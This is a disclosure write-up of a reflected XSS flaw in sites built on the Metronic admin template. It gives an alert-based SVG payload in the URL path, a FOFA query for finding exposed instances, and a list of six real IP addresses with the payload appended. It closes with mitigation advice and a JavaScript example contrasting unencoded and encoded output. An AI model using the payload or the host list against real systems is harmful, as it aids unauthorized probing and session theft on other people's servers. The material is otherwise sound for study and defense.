Metronic-XSS

1、Vulnerable system

Metronic - Responsive Admin Dashboard Template is a responsive back-end administration template built on the Bootstrap framework. It has a clean, Metro UI-style interface, 6 color schemes and 76 template pages, and bundles the components a back-end management project typically needs: charts, tables, maps, a message center, monitoring panels and so on. Systems built on this template are affected by a reflected XSS vulnerability.

2、A system built on the Metronic template looks as follows (screenshot):

3、Reflected XSS on the homepage

POC: /<svg%20onload=alert(123)>

Reproduction: open the target's base URL (IP and port) followed by the POC path in a browser; the path is reflected into the page unencoded and the alert fires.

4、Scope of impact: over 1000 exposed systems (per FOFA)

FOFA results: https://fofa.info/result?qbase64=YXBwPSJNRVRST05JQy1BZG1pbi1UaGVtZSIg

FOFA query: app="METRONIC-Admin-Theme"

5、Examples:

http://47.98.55.69:8080/<svg%20onload=alert(123)>
http://101.42.46.89:8080/<svg%20onload=alert(123)>
http://115.29.214.168:8080/<svg%20onload=alert(123)>
http://116.62.147.0:8080/<svg%20onload=alert(123)>
http://124.71.181.91:8080/<svg%20onload=alert(123)>
https://117.50.110.6/<svg%20onload=alert(123)>
.......

6、Harm:

Reflected XSS (cross-site scripting) is a common web vulnerability in which attacker-controlled input from the request (here, the URL path) is echoed into the response without encoding, so the victim's browser executes it as part of the page. The main consequences are:

1. Stealing user information: the injected script runs in the origin of the application and can read cookies (unless they are marked HttpOnly), session tokens and other sensitive data, allowing the attacker to hijack the user's account.

2. Forging requests: the script runs with the victim's session, so it can issue requests on their behalf and perform unauthorized actions such as transferring funds or changing account settings.

To prevent reflected XSS, developers should:

- Input validation: strictly validate and filter user input (a defense-in-depth measure; it is not sufficient on its own).
- Output encoding: encode user-controlled data at the point it is written into the page, using the encoder for the specific context (HTML body, attribute, JavaScript, URL).
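The following is an added example, not code from the original post or from the Metronic project. It shows the bug class described above in miniature: a page that echoes the decoded request path into its markup verbatim, the same page with HTML output encoding applied, and a check that tells the two apart using the POC path from the post. The breadcrumb layout and the function names are hypothetical; only the POC path comes from the page.

```javascript
// Added example (not from the original post or from Metronic): a request path
// reflected into HTML unencoded, beside the same page with output encoding.
// The breadcrumb markup is a hypothetical stand-in for a template page.

// Encode the five characters that can break out of HTML text or a
// double-quoted attribute value.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Decode the raw request target the way server-side code usually sees it
// (%20 becomes a space); a malformed escape sequence falls back to the raw text.
function decodePath(rawUrl) {
  try {
    return decodeURIComponent(rawUrl);
  } catch (_err) {
    return rawUrl;
  }
}

// VULNERABLE: the decoded path lands in the markup verbatim, so the request
// "/<svg%20onload=alert(123)>" produces a live <svg> element in the page.
function renderVulnerable(rawUrl) {
  const path = decodePath(rawUrl);
  return `<div class="page-bar"><span>Home</span> / <span>${path}</span></div>`;
}

// FIXED: same page, encoded at the point of output for the HTML text context.
function renderSafe(rawUrl) {
  const path = decodePath(rawUrl);
  return `<div class="page-bar"><span>Home</span> / <span>${escapeHtml(path)}</span></div>`;
}

// Reproduction check: does the response body contain the decoded payload as
// raw markup? Run this over a body fetched with curl or saved from the browser.
// An entity-encoded copy ("&lt;svg ...&gt;") does not match and is harmless.
function reflectsUnencoded(html, payload) {
  return html.includes(payload);
}

// The POC from the post, as the browser sends it on the wire, and its decoded form.
const POC_PATH = "/<svg%20onload=alert(123)>";
const PAYLOAD = decodePath(POC_PATH); // "/<svg onload=alert(123)>"

// Run the check against both renderers; returns { vulnerable, fixed }.
function demo() {
  return {
    vulnerable: reflectsUnencoded(renderVulnerable(POC_PATH), PAYLOAD),
    fixed: reflectsUnencoded(renderSafe(POC_PATH), PAYLOAD),
  };
}

console.log(renderVulnerable(POC_PATH));
console.log(renderSafe(POC_PATH));
console.log(demo()); // { vulnerable: true, fixed: false }
```

Note that `escapeHtml` is only correct for the HTML text and double-quoted attribute contexts; data written into an event handler, a `<script>` block, a `style` attribute or a URL needs the encoder for that context, and a blocklist on the input side (rejecting `<svg` or `onload`) is not a substitute for encoding at the sink.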
